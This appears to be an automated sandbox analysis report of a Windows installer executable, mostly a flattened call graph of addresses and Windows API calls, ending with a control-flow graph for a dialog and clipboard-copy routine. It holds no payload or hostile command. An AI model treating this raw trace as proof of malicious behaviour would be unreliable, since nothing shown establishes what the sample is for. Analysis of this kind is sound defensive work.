3455->3468 3456 40590a DestroyWindow KiUserCallbackDispatcher 3456->3451 3462 405585 3457->3462 3465 4055cc SendMessageW 3457->3465 3466 405598 3457->3466 3474 40557d 3457->3474 3458->3444 3458->3457 3460->3444 3461 406831 18 API calls 3461->3468 3462->3465 3462->3474 3464 403d6b 19 API calls 3464->3468 3465->3452 3469 4055a0 3466->3469 3470 4055b5 3466->3470 3467 4055b3 3467->3452 3468->3444 3468->3455 3468->3456 3468->3461 3468->3464 3490 40584a DestroyWindow 3468->3490 3502 403d6b 3468->3502 3513 40141d 3469->3513 3471 40141d 80 API calls 3470->3471 3473 4055bc 3471->3473 3473->3452 3473->3474 3516 403d44 3474->3516 3476 405731 GetDlgItem 3477 405746 3476->3477 3478 40574f ShowWindow KiUserCallbackDispatcher 3476->3478 3477->3478 3505 403db1 KiUserCallbackDispatcher 3478->3505 3480 405779 EnableWindow 3483 40578d 3480->3483 3481 405792 GetSystemMenu EnableMenuItem SendMessageW 3482 4057c2 SendMessageW 3481->3482 3481->3483 3482->3483 3483->3481 3506 403dc4 SendMessageW 3483->3506 3507 406035 lstrcpynW 3483->3507 3486 4057f0 lstrlenW 3487 406831 18 API calls 3486->3487 3488 405806 SetWindowTextW 3487->3488 3508 40139d 3488->3508 3490->3451 3491 405864 CreateDialogParamW 3490->3491 3491->3451 3492 405897 3491->3492 3493 403d6b 19 API calls 3492->3493 3494 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3493->3494 3495 40139d 80 API calls 3494->3495 3496 4058e8 3495->3496 3496->3444 3497 4058f0 ShowWindow 3496->3497 3498 403ddb SendMessageW 3497->3498 3498->3451 3500 403df3 3499->3500 3501 403de4 SendMessageW 3499->3501 3500->3468 3501->3500 3503 406831 18 API calls 3502->3503 3504 403d76 SetDlgItemTextW 3503->3504 3504->3476 3505->3480 3506->3483 3507->3486 3511 4013a4 3508->3511 3509 401410 3509->3468 3511->3509 3512 4013dd MulDiv SendMessageW 3511->3512 3533 4015a0 3511->3533 3512->3511 3514 40139d 80 API calls 3513->3514 3515 401432 3514->3515 3515->3474 3517 403d51 SendMessageW 3516->3517 3518 403d4b 3516->3518 3517->3467 3518->3517 3520 403e0b GetWindowLongW 3519->3520 3530 403e94 3519->3530 3521 403e1c 3520->3521 3520->3530 3522 403e2b GetSysColor 3521->3522 3523 403e2e 3521->3523 3522->3523 3524 403e34 SetTextColor 3523->3524 3525 403e3e SetBkMode 3523->3525 3524->3525 3526 403e56 GetSysColor 3525->3526 3527 403e5c 3525->3527 3526->3527 3528 403e63 SetBkColor 3527->3528 3529 403e6d 3527->3529 3528->3529 3529->3530 3531 403e80 DeleteObject 3529->3531 3532 403e87 CreateBrushIndirect 3529->3532 3530->3444 3531->3532 3532->3530 3534 4015fa 3533->3534 3613 40160c 3533->3613 3535 401601 3534->3535 3536 401742 3534->3536 3537 401962 3534->3537 3538 4019ca 3534->3538 3539 40176e 3534->3539 3540 401650 3534->3540 3541 4017b1 3534->3541 3542 401672 3534->3542 3543 401693 3534->3543 3544 401616 3534->3544 3545 4016d6 3534->3545 3546 401736 3534->3546 3547 401897 3534->3547 3548 4018db 3534->3548 3549 40163c 3534->3549 3550 4016bd 3534->3550 3534->3613 3559 4062cf 11 API calls 3535->3559 3551 401751 ShowWindow 3536->3551 3552 401758 3536->3552 3556 40145c 18 API calls 3537->3556 3563 40145c 18 API calls 3538->3563 3553 40145c 18 API calls 3539->3553 3577 4062cf 11 API calls 3540->3577 3557 40145c 18 API calls 3541->3557 3554 40145c 18 API calls 3542->3554 3558 401446 18 API calls 3543->3558 3562 40145c 18 API calls 3544->3562 3576 401446 18 API calls 3545->3576 3545->3613 3546->3613 3667 405f7d wsprintfW 3546->3667 3555 40145c 18 API calls 3547->3555 3560 40145c 18 API calls 3548->3560 3564 401647 PostQuitMessage 3549->3564 3549->3613 3561 4062cf 11 API calls 3550->3561 3551->3552 3565 401765 ShowWindow 3552->3565 3552->3613 3566 401775 3553->3566 3567 401678 3554->3567 3568 40189d 3555->3568 3569 401968 GetFullPathNameW 3556->3569 3570 4017b8 3557->3570 3571 40169a 3558->3571 3559->3613 3572 4018e2 3560->3572 3573 4016c7 SetForegroundWindow 3561->3573 3574 40161c 3562->3574 3575 4019d1 SearchPathW 3563->3575 3564->3613 3565->3613 3579 4062cf 11 API calls 3566->3579 3580 4062cf 11 API calls 3567->3580 3658 406301 FindFirstFileW 3568->3658 3582 4019a1 3569->3582 3583 40197f 3569->3583 3584 4062cf 11 API calls 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 40145c 18 API calls 3572->3586 3573->3613 3587 4062cf 11 API calls 3574->3587 3575->3546 3575->3613 3576->3613 3588 401664 3577->3588 3589 401785 SetFileAttributesW 3579->3589 3590 401683 3580->3590 3602 4019b8 GetShortPathNameW 3582->3602 3582->3613 3583->3582 3608 406301 2 API calls 3583->3608 3592 4017c9 3584->3592 3593 4016a7 Sleep 3585->3593 3594 4018eb 3586->3594 3595 401627 3587->3595 3596 40139d 65 API calls 3588->3596 3597 40179a 3589->3597 3589->3613 3606 404f9e 25 API calls 3590->3606 3640 405d85 CharNextW CharNextW 3592->3640 3593->3613 3603 40145c 18 API calls 3594->3603 3604 404f9e 25 API calls 3595->3604 3596->3613 3605 4062cf 11 API calls 3597->3605 3598 4018c2 3609 4062cf 11 API calls 3598->3609 3599 4018a9 3607 4062cf 11 API calls 3599->3607 3602->3613 3611 4018f5 3603->3611 3604->3613 3605->3613 3606->3613 3607->3613 3612 401991 3608->3612 3609->3613 3610 4017d4 3614 401864 3610->3614 3617 405d32 CharNextW 3610->3617 3635 4062cf 11 API calls 3610->3635 3615 4062cf 11 API calls 3611->3615 3612->3582 3666 406035 lstrcpynW 3612->3666 3613->3511 3614->3590 3616 40186e 3614->3616 3618 401902 MoveFileW 3615->3618 3646 404f9e 3616->3646 3621 4017e6 CreateDirectoryW 3617->3621 3622 401912 3618->3622 3623 40191e 3618->3623 3621->3610 3625 4017fe GetLastError 3621->3625 3622->3590 3629 406301 2 API calls 3623->3629 3639 401942 3623->3639 3627 401827 GetFileAttributesW 3625->3627 3628 40180b GetLastError 3625->3628 3627->3610 3632 4062cf 11 API calls 3628->3632 3633 401929 3629->3633 3630 401882 SetCurrentDirectoryW 3630->3613 3631 4062cf 11 API calls 3634 40195c 3631->3634 3632->3610 3633->3639 3661 406c94 3633->3661 3634->3613 3635->3610 3638 404f9e 25 API calls 3638->3639 3639->3631 3641 405da2 3640->3641 3644 405db4 3640->3644 3643 405daf CharNextW 3641->3643 3641->3644 3642 405dd8 3642->3610 3643->3642 3644->3642 3645 405d32 CharNextW 3644->3645 3645->3644 3647 404fb7 3646->3647 3648 401875 3646->3648 3649 404fd5 lstrlenW 3647->3649 3650 406831 18 API calls 3647->3650 3657 406035 lstrcpynW 3648->3657 3651 404fe3 lstrlenW 3649->3651 3652 404ffe 3649->3652 3650->3649 3651->3648 3653 404ff5 lstrcatW 3651->3653 3654 405011 3652->3654 3655 405004 SetWindowTextW 3652->3655 3653->3652 3654->3648 3656 405017 SendMessageW SendMessageW SendMessageW 3654->3656 3655->3654 3656->3648 3657->3630 3659 4018a5 3658->3659 3660 406317 FindClose 3658->3660 3659->3598 3659->3599 3660->3659 3668 406328 GetModuleHandleA 3661->3668 3665 401936 3665->3638 3666->3582 3667->3613 3669 406340 LoadLibraryA 3668->3669 3670 40634b GetProcAddress 3668->3670 3669->3670 3671 406359 3669->3671 3670->3671 3671->3665 3672 406ac5 lstrcpyW 3671->3672 3673 406b13 GetShortPathNameW 3672->3673 3674 406aea 3672->3674 3675 406b2c 3673->3675 3676 406c8e 3673->3676 3698 405e7c GetFileAttributesW CreateFileW 3674->3698 3675->3676 3679 406b34 WideCharToMultiByte 3675->3679 3676->3665 3678 406af3 CloseHandle GetShortPathNameW 3678->3676 3680 406b0b 3678->3680 3679->3676 3681 406b51 WideCharToMultiByte 3679->3681 3680->3673 3680->3676 3681->3676 3682 406b69 wsprintfA 3681->3682 3683 406831 18 API calls 3682->3683 3684 406b95 3683->3684 3699 405e7c GetFileAttributesW CreateFileW 3684->3699 3686 406ba2 3686->3676 3687 406baf GetFileSize GlobalAlloc 3686->3687 3688 406bd0 ReadFile 3687->3688 3689 406c84 CloseHandle 3687->3689 3688->3689 3690 406bea 3688->3690 3689->3676 3690->3689 3700 405de2 lstrlenA 3690->3700 3693 406c03 lstrcpyA 3696 406c25 3693->3696 3694 406c17 3695 405de2 4 API calls 3694->3695 3695->3696 3697 406c5c SetFilePointer WriteFile GlobalFree 3696->3697 3697->3689 3698->3678 3699->3686 3701 405e23 lstrlenA 3700->3701 3702 405e2b 3701->3702 3703 405dfc lstrcmpiA 3701->3703 3702->3693 3702->3694 3703->3702 3704 405e1a CharNextA 3703->3704 3704->3701 4890 402da5 4891 4030e3 4890->4891 4892 402dac 4890->4892 4893 401446 18 API calls 4892->4893 4894 402db8 4893->4894 4895 402dbf SetFilePointer 4894->4895 4895->4891 4896 402dcf 4895->4896 4896->4891 4898 405f7d wsprintfW 4896->4898 4898->4891 4899 4049a8 GetDlgItem GetDlgItem 4900 4049fe 7 API calls 4899->4900 4905 404c16 4899->4905 4901 404aa2 DeleteObject 4900->4901 4902 404a96 SendMessageW 4900->4902 4903 404aad 4901->4903 4902->4901 4906 404ae4 4903->4906 4909 406831 18 API calls 4903->4909 4904 404cfb 4907 404da0 4904->4907 4908 404c09 4904->4908 4913 404d4a SendMessageW 4904->4913 4905->4904 4917 40487a 5 API calls 4905->4917 4930 404c86 4905->4930 4912 403d6b 19 API calls 4906->4912 4910 404db5 4907->4910 4911 404da9 SendMessageW 4907->4911 4914 403df6 8 API calls 4908->4914 4915 404ac6 SendMessageW SendMessageW 4909->4915 4922 404dc7 ImageList_Destroy 4910->4922 4923 404dce 4910->4923 4928 404dde 4910->4928 4911->4910 4918 404af8 4912->4918 4913->4908 4920 404d5f SendMessageW 4913->4920 4921 404f97 4914->4921 4915->4903 4916 404ced SendMessageW 4916->4904 4917->4930 4924 403d6b 19 API calls 4918->4924 4919 404f48 4919->4908 4929 404f5d ShowWindow GetDlgItem ShowWindow 4919->4929 4925 404d72 4920->4925 4922->4923 4926 404dd7 GlobalFree 4923->4926 4923->4928 4932 404b09 4924->4932 4934 404d83 SendMessageW 4925->4934 4926->4928 4927 404bd6 GetWindowLongW SetWindowLongW 4931 404bf0 4927->4931 4928->4919 4933 40141d 80 API calls 4928->4933 4943 404e10 4928->4943 4929->4908 4930->4904 4930->4916 4935 404bf6 ShowWindow 4931->4935 4936 404c0e 4931->4936 4932->4927 4938 404b65 SendMessageW 4932->4938 4939 404bd0 4932->4939 4941 404b93 SendMessageW 4932->4941 4942 404ba7 SendMessageW 4932->4942 4933->4943 4934->4907 4950 403dc4 SendMessageW 4935->4950 4951 403dc4 SendMessageW 4936->4951 4938->4932 4939->4927 4939->4931 4941->4932 4942->4932 4944 404e54 4943->4944 4947 404e3e SendMessageW 4943->4947 4945 404f1f InvalidateRect 4944->4945 4949 404ecd SendMessageW SendMessageW 4944->4949 4945->4919 4946 404f35 4945->4946 4948 4043d9 21 API calls 4946->4948 4947->4944 4948->4919 4949->4944 4950->4908 4951->4905 4952 4030a9 SendMessageW 4953 4030c2 InvalidateRect 4952->4953 4954 4030e3 4952->4954 4953->4954 3905 4038af #17 SetErrorMode OleInitialize 3906 406328 3 API calls 3905->3906 3907 4038f2 SHGetFileInfoW 3906->3907 3979 406035 lstrcpynW 3907->3979 3909 40391d GetCommandLineW 3980 406035 lstrcpynW 3909->3980 3911 40392f GetModuleHandleW 3912 403947 3911->3912 3913 405d32 CharNextW 3912->3913 3914 403956 CharNextW 3913->3914 3925 403968 3914->3925 3915 403a02 3916 403a21 GetTempPathW 3915->3916 3981 4037f8 3916->3981 3918 403a37 3920 403a3b GetWindowsDirectoryW lstrcatW 3918->3920 3921 403a5f DeleteFileW 3918->3921 3919 405d32 CharNextW 3919->3925 3923 4037f8 11 API calls 3920->3923 3989 4035b3 GetTickCount GetModuleFileNameW 3921->3989 3926 403a57 3923->3926 3924 403a73 3927 403af8 3924->3927 3929 405d32 CharNextW 3924->3929 3965 403add 3924->3965 3925->3915 3925->3919 3932 403a04 3925->3932 3926->3921 3926->3927 4074 403885 3927->4074 3933 403a8a 3929->3933 4081 406035 lstrcpynW 3932->4081 3944 403b23 lstrcatW lstrcmpiW 3933->3944 3945 403ab5 3933->3945 3934 403aed 3937 406113 9 API calls 3934->3937 3935 403bfa 3938 403c7d 3935->3938 3940 406328 3 API calls 3935->3940 3936 403b0d 3939 405ccc MessageBoxIndirectW 3936->3939 3937->3927 3941 403b1b ExitProcess 3939->3941 3943 403c09 3940->3943 3947 406328 3 API calls 3943->3947 3944->3927 3946 403b3f CreateDirectoryW SetCurrentDirectoryW 3944->3946 4082 4067aa 3945->4082 3949 403b62 3946->3949 3950 403b57 3946->3950 3951 403c12 3947->3951 4099 406035 lstrcpynW 3949->4099 4098 406035 lstrcpynW 3950->4098 3955 406328 3 API calls 3951->3955 3958 403c1b 3955->3958 3957 403b70 4100 406035 lstrcpynW 3957->4100 3959 403c69 ExitWindowsEx 3958->3959 3964 403c29 GetCurrentProcess 3958->3964 3959->3938 3963 403c76 3959->3963 3960 403ad2 4097 406035 lstrcpynW 3960->4097 3966 40141d 80 API calls 3963->3966 3968 403c39 3964->3968 4017 405958 3965->4017 3966->3938 3967 406831 18 API calls 3969 403b98 DeleteFileW 3967->3969 3968->3959 3970 403ba5 CopyFileW 3969->3970 3976 403b7f 3969->3976 3970->3976 3971 403bee 3972 406c94 42 API calls 3971->3972 3974 403bf5 3972->3974 3973 406c94 42 API calls 3973->3976 3974->3927 3975 406831 18 API calls 3975->3976 3976->3967 3976->3971 3976->3973 3976->3975 3978 403bd9 CloseHandle 3976->3978 4101 405c6b CreateProcessW 3976->4101 3978->3976 3979->3909 3980->3911 3982 406064 5 API calls 3981->3982 3983 403804 3982->3983 3984 40380e 3983->3984 3985 40674e 3 API calls 3983->3985 3984->3918 3986 403816 CreateDirectoryW 3985->3986 3987 405eab 2 API calls 3986->3987 3988 40382a 3987->3988 3988->3918 4104 405e7c GetFileAttributesW CreateFileW 3989->4104 3991 4035f3 4011 403603 3991->4011 4105 406035 lstrcpynW 3991->4105 3993 403619 4106 40677d lstrlenW 3993->4106 3997 40362a GetFileSize 3998 403726 3997->3998 4012 403641 3997->4012 4111 4032d2 3998->4111 4000 40372f 4002 40376b GlobalAlloc 4000->4002 4000->4011 4123 403368 SetFilePointer 4000->4123 4001 403336 ReadFile 4001->4012 4122 403368 SetFilePointer 4002->4122 4005 4037e9 4008 4032d2 6 API calls 4005->4008 4006 403786 4009 40337f 33 API calls 4006->4009 4007 40374c 4010 403336 ReadFile 4007->4010 4008->4011 4015 403792 4009->4015 4014 403757 4010->4014 4011->3924 4012->3998 4012->4001 4012->4005 4012->4011 4013 4032d2 6 API calls 4012->4013 4013->4012 4014->4002 4014->4011 4015->4011 4015->4015 4016 4037c0 SetFilePointer 4015->4016 4016->4011 4018 406328 3 API calls 4017->4018 4019 40596c 4018->4019 4020 405972 4019->4020 4021 405984 4019->4021 4137 405f7d wsprintfW 4020->4137 4022 405eff 3 API calls 4021->4022 4023 4059b5 4022->4023 4025 4059d4 lstrcatW 4023->4025 4027 405eff 3 API calls 4023->4027 4026 405982 4025->4026 4128 403ec1 4026->4128 4027->4025 4030 4067aa 18 API calls 4031 405a06 4030->4031 4032 405a9c 4031->4032 4034 405eff 3 API calls 4031->4034 4033 4067aa 18 API calls 4032->4033 4035 405aa2 4033->4035 4036 405a38 4034->4036 4037 405ab2 4035->4037 4038 406831 18 API calls 4035->4038 4036->4032 4040 405a5b lstrlenW 4036->4040 4043 405d32 CharNextW 4036->4043 4039 405ad2 LoadImageW 4037->4039 4139 403ea0 4037->4139 4038->4037 4041 405b92 4039->4041 4042 405afd RegisterClassW 4039->4042 4044 405a69 lstrcmpiW 4040->4044 4045 405a8f 4040->4045 4049 40141d 80 API calls 4041->4049 4047 405b9c 4042->4047 4048 405b45 SystemParametersInfoW CreateWindowExW 4042->4048 4050 405a56 4043->4050 4044->4045 4051 405a79 GetFileAttributesW 4044->4051 4053 40674e 3 API calls 4045->4053 4047->3934 4048->4041 4054 405b98 4049->4054 4050->4040 4055 405a85 4051->4055 4052 405ac8 4052->4039 4056 405a95 4053->4056 4054->4047 4057 403ec1 19 API calls 4054->4057 4055->4045 4058 40677d 2 API calls 4055->4058 4138 406035 lstrcpynW 4056->4138 4060 405ba9 4057->4060 4058->4045 4061 405bb5 ShowWindow LoadLibraryW 4060->4061 4062 405c38 4060->4062 4063 405bd4 LoadLibraryW 4061->4063 4064 405bdb GetClassInfoW 4061->4064 4065 405073 83 API calls 4062->4065 4063->4064 4066 405c05 DialogBoxParamW 4064->4066 4067 405bef GetClassInfoW RegisterClassW 4064->4067 4068 405c3e 4065->4068 4071 40141d 80 API calls 4066->4071 4067->4066 4069 405c42 4068->4069 4070 405c5a 4068->4070 4069->4047 4073 40141d 80 API calls 4069->4073 4072 40141d 80 API calls 4070->4072 4071->4047 4072->4047 4073->4047 4075 40389d 4074->4075 4076 40388f CloseHandle 4074->4076 4146 403caf 4075->4146 4076->4075 4081->3916 4199 406035 lstrcpynW 4082->4199 4084 4067bb 4085 405d85 4 API calls 4084->4085 4086 4067c1 4085->4086 4087 406064 5 API calls 4086->4087 4094 403ac3 4086->4094 4090 4067d1 4087->4090 4088 406809 lstrlenW 4089 406810 4088->4089 4088->4090 4092 40674e 3 API calls 4089->4092 4090->4088 4091 406301 2 API calls 4090->4091 4090->4094 4095 40677d 2 API calls 4090->4095 4091->4090 4093 406816 GetFileAttributesW 4092->4093 4093->4094 4094->3927 4096 406035 lstrcpynW 4094->4096 4095->4088 4096->3960 4097->3965 4098->3949 4099->3957 4100->3976 4102 405ca6 4101->4102 4103 405c9a CloseHandle 4101->4103 4102->3976 4103->4102 4104->3991 4105->3993 4107 40678c 4106->4107 4108 406792 CharPrevW 4107->4108 4109 40361f 4107->4109 4108->4107 4108->4109 4110 406035 lstrcpynW 4109->4110 4110->3997 4112 4032f3 4111->4112 4113 4032db 4111->4113 4116 403303 GetTickCount 4112->4116 4117 4032fb 4112->4117 4114 4032e4 DestroyWindow 4113->4114 4115 4032eb 4113->4115 4114->4115 4115->4000 4119 403311 CreateDialogParamW ShowWindow 4116->4119 4120 403334 4116->4120 4124 40635e 4117->4124 4119->4120 4120->4000 4122->4006 4123->4007 4125 40637b PeekMessageW 4124->4125 4126 406371 DispatchMessageW 4125->4126 4127 403301 4125->4127 4126->4125 4127->4000 4129 403ed5 4128->4129 4144 405f7d wsprintfW 4129->4144 4131 403f49 4132 406831 18 API calls 4131->4132 4133 403f55 SetWindowTextW 4132->4133 4134 403f70 4133->4134 4135 403f8b 4134->4135 4136 406831 18 API calls 4134->4136 4135->4030 4136->4134 4137->4026 4138->4032 4145 406035 lstrcpynW 4139->4145 4141 403eb4 4142 40674e 3 API calls 4141->4142 4143 403eba lstrcatW 4142->4143 4143->4052 4144->4131 4145->4141 4147 403cbd 4146->4147 4148 4038a2 4147->4148 4149 403cc2 FreeLibrary GlobalFree 4147->4149 4150 406cc7 4148->4150 4149->4148 4149->4149 4151 4067aa 18 API calls 4150->4151 4152 406cda 4151->4152 4153 406ce3 DeleteFileW 4152->4153 4154 406cfa 4152->4154 4193 4038ae CoUninitialize 4153->4193 4155 406e77 4154->4155 4197 406035 lstrcpynW 4154->4197 4161 406301 2 API calls 4155->4161 4181 406e84 4155->4181 4155->4193 4157 406d25 4158 406d39 4157->4158 4159 406d2f lstrcatW 4157->4159 4162 40677d 2 API calls 4158->4162 4160 406d3f 4159->4160 4164 406d4f lstrcatW 4160->4164 4166 406d57 lstrlenW FindFirstFileW 4160->4166 4163 406e90 4161->4163 4162->4160 4167 40674e 3 API calls 4163->4167 4163->4193 4164->4166 4165 4062cf 11 API calls 4165->4193 4170 406e67 4166->4170 4194 406d7e 4166->4194 4168 406e9a 4167->4168 4171 4062cf 11 API calls 4168->4171 4169 405d32 CharNextW 4169->4194 4170->4155 4172 406ea5 4171->4172 4173 405e5c 2 API calls 4172->4173 4174 406ead RemoveDirectoryW 4173->4174 4178 406ef0 4174->4178 4179 406eb9 4174->4179 4175 406e44 FindNextFileW 4177 406e5c FindClose 4175->4177 4175->4194 4177->4170 4180 404f9e 25 API calls 4178->4180 4179->4181 4182 406ebf 4179->4182 4180->4193 4181->4165 4184 4062cf 11 API calls 4182->4184 4183 4062cf 11 API calls 4183->4194 4185 406ec9 4184->4185 4188 404f9e 25 API calls 4185->4188 4186 406cc7 72 API calls 4186->4194 4187 405e5c 2 API calls 4189 406dfa DeleteFileW 4187->4189 4190 406ed3 4188->4190 4189->4194 4191 406c94 42 API calls 4190->4191 4191->4193 4192 404f9e 25 API calls 4192->4175 4193->3935 4193->3936 4194->4169 4194->4175 4194->4183 4194->4186 4194->4187 4194->4192 4195 404f9e 25 API calls 4194->4195 4196 406c94 42 API calls 4194->4196 4198 406035 lstrcpynW 4194->4198 4195->4194 4196->4194 4197->4157 4198->4194 4199->4084 4955 401cb2 4956 40145c 18 API calls 4955->4956 4957 401c54 4956->4957 4958 4062cf 11 API calls 4957->4958 4959 401c64 4957->4959 4960 401c59 4958->4960 4961 406cc7 81 API calls 4960->4961 4961->4959 3705 4021b5 3706 40145c 18 API calls 3705->3706 3707 4021bb 3706->3707 3708 40145c 18 API calls 3707->3708 3709 4021c4 3708->3709 3710 40145c 18 API calls 3709->3710 3711 4021cd 3710->3711 3712 40145c 18 API calls 3711->3712 3713 4021d6 3712->3713 3714 404f9e 25 API calls 3713->3714 3715 4021e2 ShellExecuteW 3714->3715 3716 40221b 3715->3716 3717 40220d 3715->3717 3718 4062cf 11 API calls 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 402230 3718->3720 3719->3716 4962 402238 4963 40145c 18 API calls 4962->4963 4964 40223e 4963->4964 4965 4062cf 11 API calls 4964->4965 4966 40224b 4965->4966 4967 404f9e 25 API calls 4966->4967 4968 402255 4967->4968 4969 405c6b 2 API calls 4968->4969 4970 40225b 4969->4970 4971 4062cf 11 API calls 4970->4971 4979 4022ac CloseHandle 4970->4979 4976 40226d 4971->4976 4973 4030e3 4974 402283 WaitForSingleObject 4975 402291 GetExitCodeProcess 4974->4975 4974->4976 4978 4022a3 4975->4978 4975->4979 4976->4974 4977 40635e 2 API calls 4976->4977 4976->4979 4977->4974 4981 405f7d wsprintfW 4978->4981 4979->4973 4981->4979 3781 401eb9 3782 401f24 3781->3782 3785 401ec6 3781->3785 3783 401f53 GlobalAlloc 3782->3783 3787 401f28 3782->3787 3789 406831 18 API calls 3783->3789 3784 401ed5 3788 4062cf 11 API calls 3784->3788 3785->3784 3791 401ef7 3785->3791 3786 401f36 3805 406035 lstrcpynW 3786->3805 3787->3786 3790 4062cf 11 API calls 3787->3790 3800 401ee2 3788->3800 3793 401f46 3789->3793 3790->3786 3803 406035 lstrcpynW 3791->3803 3795 402708 3793->3795 3796 402387 GlobalFree 3793->3796 3796->3795 3797 401f06 3804 406035 lstrcpynW 3797->3804 3798 406831 18 API calls 3798->3800 3800->3795 3800->3798 3801 401f15 3806 406035 lstrcpynW 3801->3806 3803->3797 3804->3801 3805->3793 3806->3795 4982 404039 4983 404096 4982->4983 4984 404046 lstrcpynA lstrlenA 4982->4984 4984->4983 4985 404077 4984->4985 4985->4983 4986 404083 GlobalFree 4985->4986 4986->4983

                                                              Executed Functions

                                                              Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                              • GetClientRect.USER32(?,?), ref: 004051C2
                                                              • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                              • ShowWindow.USER32(?,00000008), ref: 00405266
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                              • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                              • ShowWindow.USER32(00000000), ref: 00405313
                                                              • ShowWindow.USER32(?,00000008), ref: 00405318
                                                              • ShowWindow.USER32(00000008), ref: 0040535F
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                              • CreatePopupMenu.USER32 ref: 004053A2
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                              • GetWindowRect.USER32(?,?), ref: 004053CA
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                              • OpenClipboard.USER32(00000000), ref: 00405437
                                                              • EmptyClipboard.USER32 ref: 0040543D
                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                              • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                              • CloseClipboard.USER32 ref: 0040549A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
